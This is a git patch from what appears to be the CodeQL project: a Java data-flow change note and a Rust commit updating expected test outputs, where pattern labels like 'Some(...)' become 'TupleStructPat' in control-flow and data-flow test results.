00000000000..258c0e5326b --- /dev/null +++ b/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The data flow library has been updated to track types in a slightly different way: The type of the tainted data (which may be stored into fields, etc.) is tracked more precisely, while the types of intermediate containers for nested contents is tracked less precisely. This may have a slight effect on false positives for complex flow paths. From 66e4acf53eea14097955c2c06fad07005eff6083 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 4 Dec 2024 10:56:14 +0100 Subject: [PATCH 0787/1267] Rust: accept test changes --- .../canonical_path/canonical_paths.expected | 2 +- .../generated/BoxPat/BoxPat_getPat.expected | 2 +- .../IdentPat/IdentPat_getPat.expected | 2 +- .../generated/LetExpr/LetExpr_getPat.expected | 2 +- .../generated/LetStmt/LetStmt_getPat.expected | 2 +- .../MatchArm/MatchArm_getPat.expected | 4 +- .../generated/OrPat/OrPat_getPat.expected | 2 +- .../generated/RefPat/RefPat_getPat.expected | 2 +- .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat_getField.expected | 14 +- .../TupleStructPat_getPath.expected | 6 +- .../controlflow-unstable/Cfg.expected | 6 +- .../library-tests/controlflow/Cfg.expected | 68 +++++----- .../dataflow/local/DataFlowStep.expected | 68 +++++----- .../dataflow/local/inline-flow.expected | 36 ++--- .../dataflow/models/models.expected | 6 +- .../test/library-tests/variables/Cfg.expected | 128 +++++++++--------- 17 files changed, 178 insertions(+), 178 deletions(-) diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 09583dcf9f6..7b6cb391556 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected @@ -62,5 +62,5 @@ resolvedPaths | regular.rs:54:9:54:25 | Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | | regular.rs:58:11:58:11 | e | None | None | | regular.rs:59:9:59:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | -| regular.rs:60:9:60:27 | ...::Variant2(...) | repo::test | crate::regular::MyEnum::Variant2 | +| regular.rs:60:9:60:27 | TupleStructPat | repo::test | crate::regular::MyEnum::Variant2 | | regular.rs:61:9:61:31 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | diff --git a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected index a43975657a8..4e12432652d 100644 --- a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | ...::Some(...) | +| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | TupleStructPat | | gen_box_pat.rs:7:9:7:24 | box ...::None | gen_box_pat.rs:7:13:7:24 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected index 3c2fd2dc379..2e2f0d9228e 100644 --- a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected @@ -1 +1 @@ -| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | ...::Some(...) | +| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected index b935bd98013..7c31e314128 100644 --- a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected @@ -1 +1 @@ -| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | Some(...) | +| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected index cd4c3f8cc64..758837c946d 100644 --- a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected @@ -3,4 +3,4 @@ | gen_let_stmt.rs:7:5:7:15 | let ... | gen_let_stmt.rs:7:9:7:9 | x | | gen_let_stmt.rs:8:5:8:10 | let ... | gen_let_stmt.rs:8:9:8:9 | x | | gen_let_stmt.rs:9:5:9:24 | let ... = ... | gen_let_stmt.rs:9:9:9:14 | TuplePat | -| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | Some(...) | +| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected index d4adba7f838..9928555fc32 100644 --- a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected @@ -1,4 +1,4 @@ -| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | ...::Some(...) | +| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | TupleStructPat | | gen_match_arm.rs:7:9:7:26 | ...::None => 0 | gen_match_arm.rs:7:9:7:20 | ...::None | -| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | Some(...) | +| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | TupleStructPat | | gen_match_arm.rs:11:9:11:15 | _ => 0 | gen_match_arm.rs:11:9:11:9 | _ | diff --git a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected index 9e50c27e035..22ebce5dde5 100644 --- a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | ...::Some(...) | +| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | TupleStructPat | | gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 1 | gen_or_pat.rs:6:27:6:38 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected index 029fd9fa172..d4f78daeb82 100644 --- a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | ...::Some(...) | +| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | TupleStructPat | | gen_ref_pat.rs:7:9:7:21 | &...::None | gen_ref_pat.rs:7:10:7:21 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index 9e9de534b1e..9a180d2a3d7 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected index 21e1a701963..5885cbcea3e 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected @@ -1,7 +1,7 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected index 34f30ed8ae1..0c07d081720 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | diff --git a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected index 7a7d9884f19..4260e2384c8 100644 --- a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected @@ -14,10 +14,10 @@ edges | test.rs:6:12:6:31 | [boolean(false)] ... && ... | test.rs:9:13:9:17 | false | false | | test.rs:6:12:6:31 | [boolean(true)] ... && ... | test.rs:7:13:7:13 | d | true | | test.rs:6:17:6:31 | let ... = b | test.rs:6:31:6:31 | b | | -| test.rs:6:21:6:27 | Some(...) | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | -| test.rs:6:21:6:27 | Some(...) | test.rs:6:26:6:26 | d | match | +| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | +| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:26:6:26 | d | match | | test.rs:6:26:6:26 | d | test.rs:6:12:6:31 | [boolean(true)] ... && ... | match | -| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | Some(...) | | +| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | TupleStructPat | | | test.rs:6:33:8:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | | test.rs:7:13:7:13 | d | test.rs:6:33:8:9 | { ... } | | | test.rs:8:16:10:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 3165b2354be..5137e2f8b89 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected @@ -191,11 +191,11 @@ edges | test.rs:98:27:98:28 | 10 | test.rs:98:24:98:28 | 1..10 | | | test.rs:99:9:103:9 | while ... { ... } | test.rs:97:25:104:5 | { ... } | | | test.rs:99:15:99:39 | let ... = ... | test.rs:99:29:99:32 | iter | | -| test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | -| test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | +| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:9:103:9 | while ... { ... } | no-match | +| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | | test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | +| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | TupleStructPat | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | @@ -274,10 +274,10 @@ edges | test.rs:137:48:143:5 | { ... } | test.rs:137:5:143:5 | exit fn test_if_let_else (normal) | | | test.rs:138:9:142:9 | if ... {...} else {...} | test.rs:137:48:143:5 | { ... } | | | test.rs:138:12:138:26 | let ... = a | test.rs:138:26:138:26 | a | | -| test.rs:138:16:138:22 | Some(...) | test.rs:138:21:138:21 | n | match | -| test.rs:138:16:138:22 | Some(...) | test.rs:141:13:141:13 | 0 | no-match | +| test.rs:138:16:138:22 | TupleStructPat | test.rs:138:21:138:21 | n | match | +| test.rs:138:16:138:22 | TupleStructPat | test.rs:141:13:141:13 | 0 | no-match | | test.rs:138:21:138:21 | n | test.rs:139:13:139:13 | n | match | -| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | Some(...) | | +| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | TupleStructPat | | | test.rs:138:28:140:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | | test.rs:139:13:139:13 | n | test.rs:138:28:140:9 | { ... } | | | test.rs:140:16:142:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | @@ -290,10 +290,10 @@ edges | test.rs:146:9:148:9 | ExprStmt | test.rs:146:12:146:26 | let ... = a | | | test.rs:146:9:148:9 | if ... {...} | test.rs:149:9:149:9 | 0 | | | test.rs:146:12:146:26 | let ... = a | test.rs:146:26:146:26 | a | | -| test.rs:146:16:146:22 | Some(...) | test.rs:146:9:148:9 | if ... {...} | no-match | -| test.rs:146:16:146:22 | Some(...) | test.rs:146:21:146:21 | n | match | +| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:9:148:9 | if ... {...} | no-match | +| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:21:146:21 | n | match | | test.rs:146:21:146:21 | n | test.rs:147:13:147:21 | ExprStmt | match | -| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | Some(...) | | +| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | TupleStructPat | | | test.rs:147:13:147:20 | return n | test.rs:145:5:150:5 | exit fn test_if_let (normal) | return | | test.rs:147:13:147:21 | ExprStmt | test.rs:147:20:147:20 | n | | | test.rs:147:20:147:20 | n | test.rs:147:13:147:20 | return n | | @@ -663,19 +663,19 @@ edges | test.rs:307:19:307:42 | ...: Option::<...> | test.rs:308:15:308:25 | maybe_digit | | | test.rs:307:52:313:5 | { ... } | test.rs:307:5:313:5 | exit fn test_match (normal) | | | test.rs:308:9:312:9 | match maybe_digit { ... } | test.rs:307:52:313:5 | { ... } | | -| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | ...::Some(...) | | -| test.rs:309:13:309:27 | ...::Some(...) | test.rs:309:26:309:26 | x | match | -| test.rs:309:13:309:27 | ...::Some(...) | test.rs:310:13:310:27 | ...::Some(...) | no-match | +| test.rs:308:15:308:25 | maybe_digit | test.rs:309:13:309:27 | TupleStructPat | | +| test.rs:309:13:309:27 | TupleStructPat | test.rs:309:26:309:26 | x | match | +| test.rs:309:13:309:27 | TupleStructPat | test.rs:310:13:310:27 | TupleStructPat | no-match | | test.rs:309:26:309:26 | x | test.rs:309:32:309:32 | x | match | | test.rs:309:32:309:32 | x | test.rs:309:36:309:37 | 10 | | | test.rs:309:32:309:37 | ... < ... | test.rs:309:42:309:42 | x | true | -| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | ...::Some(...) | false | +| test.rs:309:32:309:37 | ... < ... | test.rs:310:13:310:27 | TupleStructPat | false | | test.rs:309:36:309:37 | 10 | test.rs:309:32:309:37 | ... < ... | | | test.rs:309:42:309:42 | x | test.rs:309:46:309:46 | 5 | | | test.rs:309:42:309:46 | ... + ... | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:309:46:309:46 | 5 | test.rs:309:42:309:46 | ... + ... | | -| test.rs:310:13:310:27 | ...::Some(...) | test.rs:310:26:310:26 | x | match | -| test.rs:310:13:310:27 | ...::Some(...) | test.rs:311:13:311:24 | ...::None | no-match | +| test.rs:310:13:310:27 | TupleStructPat | test.rs:310:26:310:26 | x | match | +| test.rs:310:13:310:27 | TupleStructPat | test.rs:311:13:311:24 | ...::None | no-match | | test.rs:310:26:310:26 | x | test.rs:310:32:310:32 | x | match | | test.rs:310:32:310:32 | x | test.rs:308:9:312:9 | match maybe_digit { ... } | | | test.rs:311:13:311:24 | ...::None | test.rs:311:29:311:29 | 5 | match | @@ -686,7 +686,7 @@ edges | test.rs:315:44:315:67 | ...: Option::<...> | test.rs:316:19:316:29 | maybe_digit | | | test.rs:315:77:324:5 | { ... } | test.rs:315:5:324:5 | exit fn test_match_with_return_in_scrutinee (normal) | | | test.rs:316:9:323:9 | match ... { ... } | test.rs:315:77:324:5 | { ... } | | -| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | ...::Some(...) | | +| test.rs:316:16:320:9 | if ... {...} else {...} | test.rs:321:13:321:27 | TupleStructPat | | | test.rs:316:19:316:29 | maybe_digit | test.rs:316:34:316:37 | Some | | | test.rs:316:19:316:40 | ... == ... | test.rs:317:13:317:21 | ExprStmt | true | | test.rs:316:19:316:40 | ... == ... | test.rs:319:13:319:23 | maybe_digit | false | @@ -698,8 +698,8 @@ edges | test.rs:317:20:317:20 | 3 | test.rs:317:13:317:20 | return 3 | | | test.rs:318:16:320:9 | { ... } | test.rs:316:16:320:9 | if ... {...} else {...} | | | test.rs:319:13:319:23 | maybe_digit | test.rs:318:16:320:9 | { ... } | | -| test.rs:321:13:321:27 | ...::Some(...) | test.rs:321:26:321:26 | x | match | -| test.rs:321:13:321:27 | ...::Some(...) | test.rs:322:13:322:24 | ...::None | no-match | +| test.rs:321:13:321:27 | TupleStructPat | test.rs:321:26:321:26 | x | match | +| test.rs:321:13:321:27 | TupleStructPat | test.rs:322:13:322:24 | ...::None | no-match | | test.rs:321:26:321:26 | x | test.rs:321:32:321:32 | x | match | | test.rs:321:32:321:32 | x | test.rs:321:36:321:36 | 5 | | | test.rs:321:32:321:36 | ... + ... | test.rs:316:9:323:9 | match ... { ... } | | @@ -716,9 +716,9 @@ edges | test.rs:327:9:330:18 | ... && ... | test.rs:326:60:331:5 | { ... } | | | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | test.rs:327:9:330:18 | ... && ... | false | | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | test.rs:330:15:330:18 | cond | true | -| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | Some(...) | | -| test.rs:328:13:328:19 | Some(...) | test.rs:328:18:328:18 | a | match | -| test.rs:328:13:328:19 | Some(...) | test.rs:329:13:329:13 | _ | no-match | +| test.rs:327:16:327:16 | r | test.rs:328:13:328:19 | TupleStructPat | | +| test.rs:328:13:328:19 | TupleStructPat | test.rs:328:18:328:18 | a | match | +| test.rs:328:13:328:19 | TupleStructPat | test.rs:329:13:329:13 | _ | no-match | | test.rs:328:18:328:18 | a | test.rs:328:24:328:24 | a | match | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(false)] match r { ... } | false | | test.rs:328:24:328:24 | a | test.rs:327:10:330:9 | [boolean(true)] match r { ... } | true | @@ -731,12 +731,12 @@ edges | test.rs:333:35:333:58 | ...: Result::<...> | test.rs:334:15:334:15 | r | | | test.rs:333:66:338:5 | { ... } | test.rs:333:5:338:5 | exit fn test_match_with_no_arms (normal) | | | test.rs:334:9:337:9 | match r { ... } | test.rs:333:66:338:5 | { ... } | | -| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | Ok(...) | | -| test.rs:335:13:335:21 | Ok(...) | test.rs:335:16:335:20 | value | match | -| test.rs:335:13:335:21 | Ok(...) | test.rs:336:13:336:22 | Err(...) | no-match | +| test.rs:334:15:334:15 | r | test.rs:335:13:335:21 | TupleStructPat | | +| test.rs:335:13:335:21 | TupleStructPat | test.rs:335:16:335:20 | value | match | +| test.rs:335:13:335:21 | TupleStructPat | test.rs:336:13:336:22 | TupleStructPat | no-match | | test.rs:335:16:335:20 | value | test.rs:335:26:335:30 | value | match | | test.rs:335:26:335:30 | value | test.rs:334:9:337:9 | match r { ... } | | -| test.rs:336:13:336:22 | Err(...) | test.rs:336:17:336:21 | never | match | +| test.rs:336:13:336:22 | TupleStructPat | test.rs:336:17:336:21 | never | match | | test.rs:336:17:336:21 | never | test.rs:336:33:336:37 | never | match | | test.rs:336:27:336:40 | match never { ... } | test.rs:334:9:337:9 | match r { ... } | | | test.rs:336:33:336:37 | never | test.rs:336:27:336:40 | match never { ... } | | @@ -746,10 +746,10 @@ edges | test.rs:343:23:343:36 | ...: Option::<...> | test.rs:344:9:344:57 | let ... = a else {...} | | | test.rs:343:46:346:5 | { ... } | test.rs:343:5:346:5 | exit fn test_let_match (normal) | | | test.rs:344:9:344:57 | let ... = a else {...} | test.rs:344:23:344:23 | a | | -| test.rs:344:13:344:19 | Some(...) | test.rs:344:18:344:18 | n | match | -| test.rs:344:13:344:19 | Some(...) | test.rs:344:39:344:53 | MacroStmts | no-match | +| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:18:344:18 | n | match | +| test.rs:344:13:344:19 | TupleStructPat | test.rs:344:39:344:53 | MacroStmts | no-match | | test.rs:344:18:344:18 | n | test.rs:345:9:345:9 | n | match | -| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | Some(...) | | +| test.rs:344:23:344:23 | a | test.rs:344:13:344:19 | TupleStructPat | | | test.rs:344:32:344:54 | ...::panic_fmt | test.rs:344:39:344:53 | "Expected some" | | | test.rs:344:32:344:54 | MacroExpr | test.rs:344:30:344:56 | { ... } | | | test.rs:344:39:344:53 | "Expected some" | test.rs:344:39:344:53 | FormatArgsExpr | | @@ -770,9 +770,9 @@ edges | test.rs:349:9:352:10 | let ... = ... | test.rs:349:25:349:25 | m | | | test.rs:349:13:349:15 | ret | test.rs:353:9:353:12 | true | match | | test.rs:349:19:352:9 | match m { ... } | test.rs:349:13:349:15 | ret | | -| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | Some(...) | | -| test.rs:350:13:350:21 | Some(...) | test.rs:350:18:350:20 | ret | match | -| test.rs:350:13:350:21 | Some(...) | test.rs:351:13:351:16 | None | no-match | +| test.rs:349:25:349:25 | m | test.rs:350:13:350:21 | TupleStructPat | | +| test.rs:350:13:350:21 | TupleStructPat | test.rs:350:18:350:20 | ret | match | +| test.rs:350:13:350:21 | TupleStructPat | test.rs:351:13:351:16 | None | no-match | | test.rs:350:18:350:20 | ret | test.rs:350:26:350:28 | ret | match | | test.rs:350:26:350:28 | ret | test.rs:349:19:352:9 | match m { ... } | | | test.rs:351:13:351:16 | None | test.rs:351:28:351:32 | false | match | @@ -1030,10 +1030,10 @@ edges | test.rs:484:13:484:13 | x | test.rs:485:9:487:10 | let ... = x else {...} | match | | test.rs:484:30:484:33 | None | test.rs:484:13:484:13 | x | | | test.rs:485:9:487:10 | let ... = x else {...} | test.rs:485:23:485:23 | x | | -| test.rs:485:13:485:19 | Some(...) | test.rs:485:18:485:18 | y | match | -| test.rs:485:13:485:19 | Some(...) | test.rs:486:13:486:27 | ExprStmt | no-match | +| test.rs:485:13:485:19 | TupleStructPat | test.rs:485:18:485:18 | y | match | +| test.rs:485:13:485:19 | TupleStructPat | test.rs:486:13:486:27 | ExprStmt | no-match | | test.rs:485:18:485:18 | y | test.rs:488:9:488:9 | 0 | match | -| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | Some(...) | | +| test.rs:485:23:485:23 | x | test.rs:485:13:485:19 | TupleStructPat | | | test.rs:486:13:486:26 | break ''block 1 | test.rs:483:18:489:5 | 'block: { ... } | break | | test.rs:486:13:486:27 | ExprStmt | test.rs:486:26:486:26 | 1 | | | test.rs:486:26:486:26 | 1 | test.rs:486:13:486:26 | break ''block 1 | | diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 5e244550ff3..bc36656e49d 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -34,7 +34,7 @@ localStep | main.rs:32:9:32:9 | [SSA] b | main.rs:36:10:36:10 | b | | main.rs:32:9:32:9 | b | main.rs:32:9:32:9 | [SSA] b | | main.rs:32:13:35:5 | match m { ... } | main.rs:32:9:32:9 | b | -| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | Some(...) | +| main.rs:32:19:32:19 | m | main.rs:33:9:33:15 | TupleStructPat | | main.rs:32:19:32:19 | m | main.rs:34:9:34:12 | None | | main.rs:33:20:33:20 | a | main.rs:32:13:35:5 | match m { ... } | | main.rs:34:17:34:17 | 0 | main.rs:32:13:35:5 | match m { ... } | @@ -169,14 +169,14 @@ localStep | main.rs:199:9:199:10 | [SSA] s2 | main.rs:204:11:204:12 | s2 | | main.rs:199:9:199:10 | s2 | main.rs:199:9:199:10 | [SSA] s2 | | main.rs:199:14:199:28 | ...::Some(...) | main.rs:199:9:199:10 | s2 | -| main.rs:200:11:200:12 | s1 | main.rs:201:9:201:23 | ...::Some(...) | +| main.rs:200:11:200:12 | s1 | main.rs:201:9:201:23 | TupleStructPat | | main.rs:200:11:200:12 | s1 | main.rs:202:9:202:20 | ...::None | | main.rs:201:22:201:22 | [SSA] n | main.rs:201:33:201:33 | n | | main.rs:201:22:201:22 | n | main.rs:201:22:201:22 | [SSA] n | | main.rs:201:28:201:34 | sink(...) | main.rs:200:5:203:5 | match s1 { ... } | | main.rs:202:25:202:31 | sink(...) | main.rs:200:5:203:5 | match s1 { ... } | | main.rs:204:5:207:5 | match s2 { ... } | main.rs:197:37:208:1 | { ... } | -| main.rs:204:11:204:12 | s2 | main.rs:205:9:205:23 | ...::Some(...) | +| main.rs:204:11:204:12 | s2 | main.rs:205:9:205:23 | TupleStructPat | | main.rs:204:11:204:12 | s2 | main.rs:206:9:206:20 | ...::None | | main.rs:205:22:205:22 | [SSA] n | main.rs:205:33:205:33 | n | | main.rs:205:22:205:22 | n | 